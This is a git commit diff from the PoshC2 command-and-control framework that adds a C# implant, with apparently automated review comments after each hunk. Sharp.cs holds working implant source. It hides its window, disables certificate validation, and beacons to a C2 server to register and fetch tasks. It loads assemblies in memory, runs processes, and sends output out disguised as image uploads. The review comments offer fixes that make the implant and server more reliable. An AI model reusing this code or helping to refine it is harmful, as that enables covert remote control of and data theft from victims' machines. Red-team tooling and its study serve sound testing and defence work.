Added CSharp Implant/Dll/Shellcode - More functionality coming soon

chunking
benpturner 2018-12-27 12:10:46 +00:00
parent 971ef58e83
commit 190cb33288
15 changed files with 870 additions and 147 deletions


@ -2,7 +2,7 @@
from DB import * from DB import *
from Config import * from Config import *
import os import os, base64
def check_module_loaded( module_name, randomuri, force=False ): def check_module_loaded( module_name, randomuri, force=False ):
try: try:


@ -125,8 +125,24 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
implant_type = "Daisy" implant_type = "Daisy"
if s.path == ("%s?m" % new_implant_url): if s.path == ("%s?m" % new_implant_url):
implant_type = "OSX" implant_type = "OSX"
if s.path == ("%s?c" % new_implant_url):
implant_type = "C#"
if implant_type == "OSX": if implant_type == "C#":
cookieVal = (s.cookieHeader).replace("SessionID=","")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1])
Domain,User,Hostname,Arch,PID,Proxy = decCookie.split(";")
newImplant = Implant(IPAddress, implant_type, Domain.decode("utf-8"), User.decode("utf-8"), Hostname.decode("utf-8"), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.SharpCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
elif implant_type == "OSX":
cookieVal = (s.cookieHeader).replace("SessionID=","") cookieVal = (s.cookieHeader).replace("SessionID=","")
decCookie = decrypt(KEY, cookieVal) decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1]) IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1])
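Review bot: The new C# registration branch unpacks `decCookie.split(";")` into exactly six names, so a cookie that decrypts to any other field count raises ValueError inside the request handler and no response is written; the branch should validate the field count before trusting the values. The decryption does not authenticate the cookie (the implant side in this commit uses CBC with zero padding and no MAC), so anything that decrypts under KEY is accepted as a registration — worth stating above the `cookieVal` line, e.g. `# cookie is decrypted but not authenticated; check the field count before using it`. The enclosing handler method starts and ends outside the hunk.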


@ -38,6 +38,10 @@ def load_module(module_name):
file = codecs.open(("%sModules/%s" % (POSHDIR,module_name)), 'r', encoding='utf-8-sig') file = codecs.open(("%sModules/%s" % (POSHDIR,module_name)), 'r', encoding='utf-8-sig')
return file.read() return file.read()
def load_module_sharp(module_name):
file = open(("%sModules/%s" % (POSHDIR,module_name)), 'r+b')
return base64.b64encode(file.read())
def get_images(): def get_images():
dir_path = os.path.dirname(os.path.realpath(__file__)) dir_path = os.path.dirname(os.path.realpath(__file__))
rootimagedir = "%s/Images/" % dir_path rootimagedir = "%s/Images/" % dir_path
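Review bot: `load_module_sharp` opens the module with `open(..., 'r+b')` and never closes it, so every loadmodule leaks a handle and requests write access it does not need; `with open("%sModules/%s" % (POSHDIR,module_name), 'rb') as f:` followed by `return base64.b64encode(f.read())` fixes both. The sibling `load_module` above has the same unclosed-handle shape but is untouched by this commit.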

506
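--- a/Files/Sharp.cs
+++ b/Files/Sharp.cs
@@ -0,0 +1,506 @@
+using System;
+using System.Linq;
+using System.Net;
+using System.Text;
+using System.Text.RegularExpressions;
+using System.Reflection;
+using System.Threading;
+using System.Diagnostics;
+using System.Runtime.InteropServices;
+using System.IO;
+using System.IO.Compression;
+//mono-csc /opt/PoshC2_Python_Git/Files/Sharp.cs -out:/tmp/Sharp.dll -target:library
+//cat /tmp/Sharp.dll | base64 -w 0 | xclip
+public class Program
+{
+[DllImport("kernel32.dll")]
+static extern IntPtr GetConsoleWindow();
+[DllImport("user32.dll")]
+static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
+public const int SW_HIDE = 0;
+public const int SW_SHOW = 5;
+public static void Sharp()
+{
+var handle = GetConsoleWindow();
+ShowWindow(handle, SW_HIDE);
+AllowUntrustedCertificates();
+try { primer(); } catch {}
+Thread.Sleep(300000);
+try { primer(); } catch { }
+Thread.Sleep(600000);
+try { primer(); } catch { }
+}
+public static void Main()
+{
+Sharp();
+}
+static byte[] Combine(byte[] first, byte[] second)
+{
+byte[] ret = new byte[first.Length + second.Length];
+Buffer.BlockCopy(first, 0, ret, 0, first.Length);
+Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
+return ret;
+}
+static System.Net.WebClient GetWebRequest(string cookie)
+{
+var x = new System.Net.WebClient();
+string purl = "#REPLACEPROXYURL#";
+string puser = "#REPLACEPROXYUSER#";
+string ppass = "#REPLACEPROXYPASSWORD#";
+if (!String.IsNullOrEmpty(purl)) {
+WebProxy proxy = new WebProxy();
+proxy.Address = new Uri(purl);
+proxy.Credentials = new NetworkCredential(puser, ppass);
+proxy.UseDefaultCredentials = false;
+proxy.BypassProxyOnLocal = false;
+x.Proxy = proxy;
+}
+string df = "#REPLACEDF#";
+if (!String.IsNullOrEmpty(df)) {
+x.Headers.Add("Host",df);
+}
+x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
+x.Headers.Add("Referer", "#REPLACEREFERER#");
+if (cookie != null)
+{
+x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
+}
+return x;
+}
+static string Decryption(string key, string enc)
+{
+var b = System.Convert.FromBase64String(enc);
+Byte[] IV = new Byte[16];
+Array.Copy(b, IV, 16);
+try {
+var a = CAMR(key, System.Convert.ToBase64String(IV));
+var d = a.CreateDecryptor();
+var u = d.TransformFinalBlock(b, 16, b.Length - 16);
+return System.Text.Encoding.UTF8.GetString(u);
+} catch {
+var a = CAMA(key, System.Convert.ToBase64String(IV));
+var d = a.CreateDecryptor();
+var u = d.TransformFinalBlock(b, 16, b.Length - 16);
+return System.Text.Encoding.UTF8.GetString(u);
+}
+}
+static string Encryption(string key, string un, bool comp = false)
+{
+var b = System.Text.Encoding.UTF8.GetBytes(un);
+byte[] byEnc = b;
+if (comp){
+byEnc = Compress(b);
+}
+try {
+var a = CAMR(key, null);
+var e = a.CreateEncryptor();
+var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
+byte[] p = null;
+p = Combine(a.IV, f);
+return System.Convert.ToBase64String(p);
+} catch {
+var a = CAMA(key, null);
+var e = a.CreateEncryptor();
+var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
+byte[] p = null;
+p = Combine(a.IV, f);
+return System.Convert.ToBase64String(p);
+}
+}
+static System.Security.Cryptography.AesCryptoServiceProvider CAMA(string key,string IV)
+{
+System.Security.Cryptography.AesCryptoServiceProvider b = new System.Security.Cryptography.AesCryptoServiceProvider();
+b.Mode = System.Security.Cryptography.CipherMode.CBC;
+b.Padding = System.Security.Cryptography.PaddingMode.Zeros;
+b.BlockSize = 128;
+b.KeySize = 256;
+if (IV != null)
+{
+b.IV = System.Convert.FromBase64String(IV);
+}
+if (key != null)
+{
+b.Key = System.Convert.FromBase64String(key);
+}
+return b;
+}
+static System.Security.Cryptography.RijndaelManaged CAMR(string key,string IV)
+{
+System.Security.Cryptography.RijndaelManaged a = new System.Security.Cryptography.RijndaelManaged();
+a.Mode = System.Security.Cryptography.CipherMode.CBC;
+a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
+a.BlockSize = 128;
+a.KeySize = 256;
+if (IV != null)
+{
+a.IV = System.Convert.FromBase64String(IV);
+}
+if (key != null)
+{
+a.Key = System.Convert.FromBase64String(key);
+}
+return a;
+}
+static void AllowUntrustedCertificates()
+{
+try
+{
+System.Net.ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(delegate { return true; } );
+}
+catch { }
+}
+static void primer()
+{
+DateTime now = DateTime.Now;
+DateTime killDate = Convert.ToDateTime("#REPLACEKILLDATE#");
+if (killDate < now){
+System.Environment.Exit(1);
+}
+var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
+var dn = System.Environment.UserDomainName;
+var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
+var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
+int pid = Process.GetCurrentProcess().Id;
+Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
+string o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
+string key = "#REPLACEKEY#";
+var pp = Encryption(key, o);
+string baseURL = "#REPLACEBASEURL#";
+string s = "#REPLACESTARTURL#";
+var primer = GetWebRequest(pp).DownloadString(s);
+var x = Decryption(key, primer);
+Regex re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
+Match m = re.Match(x);
+string RandomURI = m.Groups[1].ToString();
+re = new Regex("URLS10484390243(.*)34209348401SLRU");
+m = re.Match(x);
+string URLS = m.Groups[1].ToString();
+re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
+m = re.Match(x);
+var KillDate = m.Groups[1].ToString();
+re = new Regex("SLEEP98001(.*)10089PEELS");
+m = re.Match(x);
+var Sleep = m.Groups[1].ToString();
+re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
+m = re.Match(x);
+var NewKey = m.Groups[1].ToString();
+re = new Regex("IMGS19459394(.*)49395491SGMI");
+m = re.Match(x);
+var IMGs = m.Groups[1].ToString();
+ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
+}
+static byte[] Compress(byte[] raw)
+{
+using (MemoryStream memory = new MemoryStream())
+{
+using (GZipStream gzip = new GZipStream(memory, CompressionMode.Compress, true))
+{
+gzip.Write(raw, 0, raw.Length);
+}
+return memory.ToArray();
+}
+}
+static byte[] GetImgData(byte[] cmdoutput, string[] stringnewIMGS)
+{
+Random rnd = new Random();
+string randimg = stringnewIMGS[rnd.Next(stringnewIMGS.Length)];
+byte[] imgBytes = System.Convert.FromBase64String(randimg);
+var maxByteslen = 1500;
+var maxDatalen = 1500 + cmdoutput.Length;
+var imageByteslen = imgBytes.Length;
+var paddingByteslen = maxByteslen - imageByteslen;
+var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(paddingByteslen)));
+var ImageBytesFull = new byte[maxDatalen];
+System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
+System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
+System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
+return ImageBytesFull;
+}
+static Random random = new Random();
+static string RandomString(int length)
+{
+const string chars = "...................@..........................Tyscf";
+return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray());
+}
+static Type LoadSomething(string assemblyQualifiedName)
+{
+// Throws exception is type was not found
+return Type.GetType(
+assemblyQualifiedName,
+(name) =>
+{
+// Returns the assembly of the type by enumerating loaded assemblies
+// in the app domain
+return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
+},
+null,
+true);
+}
+static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
+{
+var re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+");
+string strURLS = stringURLS.Replace(",","");
+var stringnewURLS = re.Matches(strURLS).Cast<Match>().Select(m => m.Value).ToArray();
+stringnewURLS = stringnewURLS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
+string strIMGS = stringIMGS.Replace(",","");
+var stringnewIMGS = re.Matches(strIMGS).Cast<Match>().Select(m => m.Value).ToArray();
+stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
+int beacontime = 5;
+if (!Int32.TryParse(Sleep, out beacontime))
+{
+beacontime = 5;
+}
+while(true)
+{
+Random rnd = new Random();
+string URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
+string G = (Guid.NewGuid()).ToString();
+URL = baseURL+"/"+URL+G+"/?"+RandomURI;
+Thread.Sleep(beacontime*1000);
+DateTime now = DateTime.Now;
+DateTime killDate = Convert.ToDateTime(KillDate);
+if (killDate < now){
+System.Environment.Exit(1);
+}
+var cmd = GetWebRequest(null).DownloadString(URL);
+string output = "";
+try {
+string x = "";
+try {
+x = Decryption(Key, cmd);
+x = x.Replace("\0", string.Empty);
+} catch {}
+using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\temp\log.txt", true))
+{
+file.WriteLine(x.ToString().TrimEnd());
+}
+if (x.ToLower().StartsWith("multicmd"))
+{
+string splitcmd = x.Replace("multicmd","");
+string[] split = splitcmd.Split(new string[] {"!d-3dion@LD!-d"}, StringSplitOptions.RemoveEmptyEntries);
+foreach (string c in split)
+{
+output = "";
+//add download-file
+//add upload-file
+//add implant-core features, screenshot, tasklist, etc
+if (c.ToLower() == "pwd") {
+output = Directory.GetCurrentDirectory();
+}
+if (c.ToLower().StartsWith("dir") || c.ToLower().StartsWith("ls")){
+string dirPath = "";
+var stringOutput = new StringWriter();
+Console.SetOut(stringOutput);
+if (c.ToLower() == "dir" || c.ToLower() == "ls") {
+dirPath = Directory.GetCurrentDirectory();
+} else {
+dirPath = Regex.Replace(c, "dir ", "", RegexOptions.IgnoreCase);
+dirPath = Regex.Replace(c, "ls ", "", RegexOptions.IgnoreCase);
+}
+Console.WriteLine("Directory listing: {0} \r\n", dirPath);
+string[] folderPaths = Directory.GetDirectories(dirPath, "*", SearchOption.TopDirectoryOnly);
+foreach (var f in folderPaths)
+{
+try {
+Console.WriteLine("d----- {0}", f.Normalize());
+}
+catch {}
+}
+string[] filePaths = Directory.GetFiles(dirPath, "*", SearchOption.TopDirectoryOnly);
+foreach (var f in filePaths)
+{
+try {
+Console.WriteLine("------ {0}", f.Normalize());
+}
+catch {}
+}
+output = stringOutput.ToString();
+}
+// load and execute assembly in current app domain
+if (c.ToLower().StartsWith("loadmodule")){
+//var stringOutput = new StringWriter();
+//Console.SetOut(stringOutput);
+string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
+Assembly assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
+//var pop = assembly.GetType("Seatbelt.Program").InvokeMember("UserChecks", BindingFlags.InvokeMethod, null, null, null);
+//output = stringOutput.ToString();
+}
+// list loaded assemblies
+if (c.ToLower().StartsWith("listmodules")){
+var appd = AppDomain.CurrentDomain.GetAssemblies();
+foreach (var ass in appd)
+{
+output += ass.FullName.ToString() + "\n";
+}
+}
+if (c.ToLower() == "ps"){
+var loadedType = LoadSomething("ProcHandler, Get-ProcessList, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null");
+var xxx = loadedType.Assembly.GetType("ProcHandler").InvokeMember("GetProcesses", BindingFlags.InvokeMethod, null, null, null);
+output = xxx.ToString();
+}
+// run loaded assemblies
+if (c.ToLower().StartsWith("run-assembly")){
+string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries);
+string qualifiedname = splitargs[1];
+string name = splitargs[2];
+string method = splitargs[3];
+var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
+foreach (var Ass in AppDomainAss)
+{
+if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
+{
+var stringOutput = new StringWriter();
+Console.SetOut(stringOutput);
+var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
+var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.InvokeMethod, null, null, null);
+output = stringOutput.ToString();
+}
+}
+}
+// try to load another app domain and unload each time
+if (c.ToLower().StartsWith("loadmodule-appdomain")){
+var stringOutput = new StringWriter();
+Console.SetOut(stringOutput);
+string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
+AppDomain dom = AppDomain.CreateDomain("RANDOM");
+Assembly assembly = dom.Load(System.Convert.FromBase64String(module));
+var pop = assembly.GetType("Seatbelt.Program").InvokeMember("UserChecks", BindingFlags.InvokeMethod, null, null, null);
+output = stringOutput.ToString();
+AppDomain.Unload(dom);
+}
+if (c.ToLower().StartsWith("exit")){
+System.Environment.Exit(1);
+}
+if (c.ToLower().StartsWith("start-process")){
+string proc = c.Replace("'", "");
+proc = proc.Replace("\"", "");
+string pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
+pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
+string args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
+Process p = new Process();
+p.StartInfo.UseShellExecute = false;
+p.StartInfo.RedirectStandardOutput = true;
+p.StartInfo.RedirectStandardError = true;
+p.StartInfo.CreateNoWindow = true;
+p.StartInfo.FileName = pstart;
+p.StartInfo.Arguments = args;
+p.Start();
+output = p.StandardOutput.ReadToEnd();
+output = output + p.StandardError.ReadToEnd();
+p.WaitForExit();
+}
+if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon")) {
+string beacon = Regex.Replace(c, "setbeacon ", "", RegexOptions.IgnoreCase);
+beacon = Regex.Replace(beacon, "beacon ", "", RegexOptions.IgnoreCase);
+if (beacon.ToLower().Contains("s"))
+{
+beacon = Regex.Replace(beacon, "s", "", RegexOptions.IgnoreCase);
+if (!Int32.TryParse(beacon, out beacontime))
+{
+beacontime = 5;
+}
+}
+else if (beacon.ToLower().Contains("m"))
+{
+beacon = Regex.Replace(beacon, "m", "", RegexOptions.IgnoreCase);
+if (!Int32.TryParse(beacon, out beacontime))
+{
+beacontime = 5;
+}
+beacontime = beacontime * 60;
+}
+else if (beacon.ToLower().Contains("h"))
+{
+beacon = Regex.Replace(beacon, "h", "", RegexOptions.IgnoreCase);
+if (!Int32.TryParse(beacon, out beacontime))
+{
+beacontime = 5;
+}
+beacontime = beacontime * 60;
+beacontime = beacontime * 60;
+}
+else if (!Int32.TryParse(beacon, out beacontime))
+{
+beacontime = 5;
+}
+}
+URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
+G = (Guid.NewGuid()).ToString();
+URL = baseURL+"/"+URL+G+"/?"+RandomURI;
+string task = Encryption(Key, c);
+string coutput = Encryption(Key, output, true);
+byte[] outputBytes = System.Convert.FromBase64String(coutput);
+byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
+GetWebRequest(task).UploadData(URL, sendBytes);
+}
+}
+} catch (Exception e) {
+URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
+URL = baseURL+"/"+URL+RandomURI;
+string task = Encryption(Key, "Error");
+string eroutput = Encryption(Key, "Error: " + output + e, true);
+byte[] outputBytes = System.Convert.FromBase64String(eroutput);
+byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
+GetWebRequest(task).UploadData(URL, sendBytes);
+}
+}
+}
+}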
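Review bot: `Decryption` and `Encryption` run AES-CBC with `PaddingMode.Zeros` and attach no MAC, so a ciphertext that was altered in transit or produced under a different key does not fail in `TransformFinalBlock`; it silently yields bytes that `ImplantCore` strips of `\0` and then dispatches on, and nothing in the file checks integrity or origin. The bare `catch` in `Decryption` falls through to `CAMA` on every exception (a malformed base64 key, a ciphertext that is not a block multiple) rather than only the case the fallback appears to exist for — presumably `RijndaelManaged` being refused under a FIPS policy, which the changelog in this commit hints at — so the second attempt repeats the same failure and the original exception is lost; narrow the catch to that case, or at least comment why the fallback exists. `AllowUntrustedCertificates` replaces server certificate validation with `delegate { return true; }`, so transport security rests entirely on the secrecy of `key`. A header comment on `CAMR`/`CAMA` such as `// CBC + zero padding, no MAC: callers get no integrity or authenticity guarantee` would record that contract for maintainers.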

30
Help.py

@ -1,12 +1,12 @@
#!/usr/bin/python #!/usr/bin/python
logopic = """ __________ .__. _________ ________ logopic = """ __________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \ \_______ \____ _____| |__ \_ ___ \ \_____ \\
| ___/ _ \/ ___/ | \ / \ \/ / ____/ | ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \ | | ( <_> )___ \| Y \ \ \____/ \\
|____| \____/____ >___| / \______ /\_______ \ |____| \____/____ >___| / \______ /\_______ \\
\/ \/ \/ \/ \/ \/ \/ \/
=============== v4.5 www.PoshC2.co.uk =============""" =============== v4.6 www.PoshC2.co.uk ============="""
py_help1 = """ py_help1 = """
@ -34,6 +34,26 @@ searchhelp mimikatz
back back
""" """
sharp_help1 = """
Implant Features:
=====================
ps
beacon 60s / beacon 10m / beacon 2h
ls/dir c:\\temp\\
pwd
loadmodule
loadmoduleforce
listmodule
run-assembly ProcHandler Get-ProcessList GetProcesses
start-process net -argumentlist users
kill-implant
hide-implant
unhide-implant
help
searchhelp listmodules
back
"""
posh_help1 = """ posh_help1 = """
Implant Features: Implant Features:
===================== =====================
@ -366,3 +386,5 @@ COMMANDS += ['invoke-psexecproxypayload','invoke-wmiproxypayload', 'invoke-dcomp
COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomdaisypayload'] COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomdaisypayload']
UXCOMMANDS = ["unhide-implant","hide-implant","help","searchhelp","python","loadmodule","loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai","startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"] UXCOMMANDS = ["unhide-implant","hide-implant","help","searchhelp","python","loadmodule","loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai","startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"]
SHARPCOMMANDS = ["unhide-implant","ls","pwd","dir","start-process", "hide-implant","help","searchhelp","listmodules","loadmodule","loadmoduleforce","back","ps","beacon","setbeacon","kill-implant"]
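Review bot: The `sharp_help1` entry `listmodule` does not match the name in the `SHARPCOMMANDS` completion list, which is `listmodules`, so the help text and tab completion disagree and `searchhelp listmodules` (the example given in the same help block) would not find the entry. Change the help line to `listmodules`. `kill-implant` and `exit` are both handled by the console but only `kill-implant` appears in the help and completion list; if `exit` is meant to be supported, list it in both places.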


@ -31,6 +31,13 @@ class Implant(object):
self.ServerURL = new_serverurl = select_item("HostnameIP", "C2Server") self.ServerURL = new_serverurl = select_item("HostnameIP", "C2Server")
self.AllBeaconURLs = get_otherbeaconurls() self.AllBeaconURLs = get_otherbeaconurls()
self.AllBeaconImages = get_images() self.AllBeaconImages = get_images()
self.SharpCore = """
RANDOMURI19901%s10991IRUMODNAR
URLS10484390243%s34209348401SLRU
KILLDATE1665%s5661ETADLLIK
SLEEP98001%s10089PEELS
NEWKEY8839394%s4939388YEKWEN
IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages)
with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f: with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f:
self.PythonImplant = base64.b64encode(f.read()) self.PythonImplant = base64.b64encode(f.read())
self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random
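Review bot: `self.SharpCore` interpolates `self.AllBeaconURLs`, `self.AllBeaconImages` and the other fields straight into single-line markers, and the consumer (`primer` in Files/Sharp.cs from the same commit) extracts each marker with a `(.*)` group that does not span newlines, so a value containing a newline truncates that field silently and the implant starts with a partial URL or image list. Worth a comment above the assignment: `# each value must stay on one line: the C# implant extracts these markers with (.*), which stops at a newline`. `__init__` starts and continues outside the hunk.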


@ -491,6 +491,67 @@ def runcommand(command, randomuri):
new_task(command, randomuri) new_task(command, randomuri)
return return
elif implant_type == "C#":
if "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpfull = string.split(sharp_help1, '\n')
for line in helpfull:
if searchterm in line:
print (line)
elif "unhide-implant" in command.lower():
unhide_implant(randomuri)
elif "hide-implant" in command.lower():
kill_implant(randomuri)
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print ("Implant not terminated")
if ri == "":
pid = get_pid(randomuri)
new_task("exit",randomuri)
kill_implant(randomuri)
if ri.lower() == "y":
pid = get_pid(randomuri)
new_task("exit" % pid,randomuri)
kill_implant(randomuri)
elif (command.lower() == "ps") or (command.lower() == "ps "):
check_module_loaded("Get-ProcessList.dll", randomuri)
new_task(command,randomuri)
elif "loadmoduleforce" in command.lower():
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, force=True)
elif "loadmodule" in command.lower():
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri)
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (sharp_help1)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
startup()
elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
new_task(command, randomuri)
command = command.replace('set-beacon ', '')
command = command.replace('setbeacon ', '')
command = command.replace('beacon ', '')
update_sleep(command, randomuri)
else:
if command:
new_task(command, randomuri)
return
else: else:
try: try:
check_module_loaded("Implant-Core.ps1", randomuri) check_module_loaded("Implant-Core.ps1", randomuri)
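Review bot: `new_task("exit" % pid,randomuri)` in the `y` branch of the kill prompt applies `%` to a format string with no placeholders, which raises TypeError for any ordinary `pid` value (only an empty tuple or a mapping is accepted), so answering `y` crashes the console while the empty-answer branch two lines above works; change it to `new_task("exit", randomuri)`, after which `pid` is unused in both branches and `get_pid` need not be called. The same test `"exit" in command.lower()` is a substring match, so any command containing `exit` anywhere triggers the termination prompt; `command.lower().strip() == "exit"` is the intended check. `runcommand` starts and ends outside the hunk.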
@ -929,6 +990,11 @@ def commandloop(implant_id):
readline.set_completer_delims('\t') readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete") readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter) readline.set_completer(t.listCompleter)
if hostname[15] == 'C#':
t.createListCompleter(SHARPCOMMANDS)
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
print (Colours.GREEN) print (Colours.GREEN)
print ("%s @ %s (PID:%s)" % (hostname[11],hostname[3],hostname[8])) print ("%s @ %s (PID:%s)" % (hostname[11],hostname[3],hostname[8]))
command = raw_input("%s> " % (implant_id)) command = raw_input("%s> " % (implant_id))

0
Modules/Cred-Popper.ps1 Executable file → Normal file

2
Modules/Get-Hash.ps1 Executable file → Normal file

File diff suppressed because one or more lines are too long

BIN
Modules/Get-ProcessList.dll Executable file

Binary file not shown.


@ -1,5 +1,13 @@
function SSLInspectionCheck($url, $proxyurl, $proxyuser, $proxypass){ function SSLInspectionCheck($url, $proxyurl, $proxyuser, $proxypass){
$expiration = $null
$certName = $null
$certPublicKeyString = $null
$certSerialNumber = $null
$certThumbprint = $null
$certEffectiveDate = $null
$certIssuer = $null
write-output "Checking $($url)" write-output "Checking $($url)"
$req = [Net.HttpWebRequest]::Create($url) $req = [Net.HttpWebRequest]::Create($url)

BIN
Modules/Seatbelt.exe Executable file

Binary file not shown.

File diff suppressed because one or more lines are too long


@ -35,10 +35,16 @@ def newTask(path):
if a[2].startswith("loadmodule"): if a[2].startswith("loadmodule"):
try: try:
module_name = (a[2]).replace("loadmodule ","") module_name = (a[2]).replace("loadmodule ","")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name) modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr command = "loadmodule%s" % modulestr
except Exception as e: except Exception as e:
print "Cannot find module, loadmodule is case sensitive!" print "Cannot find module, loadmodule is case sensitive!"
print e
if commands: if commands:
commands += "!d-3dion@LD!-d" + command commands += "!d-3dion@LD!-d" + command
else: else:
@ -47,8 +53,6 @@ def newTask(path):
if commands is not None: if commands is not None:
multicmd = "multicmd%s" % commands multicmd = "multicmd%s" % commands
try: try:
responseVal = encrypt(EncKey, multicmd) responseVal = encrypt(EncKey, multicmd)
except Exception as e: except Exception as e:
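Review bot: `".exe" in module_name` and `".dll" in module_name` are substring tests rather than extension checks, and both branches call the same `load_module_sharp`, so a name that merely contains those characters is read as raw bytes; `if module_name.lower().endswith((".exe", ".dll")):` with a single `load_module_sharp(module_name)` call expresses the intent. In the `except` branch the function now prints `e` but still falls through to `commands += "!d-3dion@LD!-d" + command`; if `command` has not been assigned earlier in `newTask` (the lines above the hunk are not visible here) that is a NameError on the failure path — confirm against the start of the function. `newTask` starts outside the hunk.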


@ -1,5 +1,20 @@
4.6 (26/12/18)
==============
Added Sharp Implant and corresponding DLLs/Shellcode
4.5 (19/11/18) 4.5 (19/11/18)
============== ==============
Removed Invoke-Enum
Merged Get-TokenElevationType.ps1 by jmhickman
Added TLS Config to Python Server
Updated README
Updated Get-IPAddress
Merged OfflineReportGenerator.py by skahwah
Updated to latest PowerUp.ps1
Updated INSTALL notes
Updated to work with FIPSAlgorithmPolicy
Updated to latest Invoke-Kerberoast & Invoke-Mimikatz
Removed process start for Netsh.exe on non migrate executable
4.4 (10/11/18) 4.4 (10/11/18)
============== ==============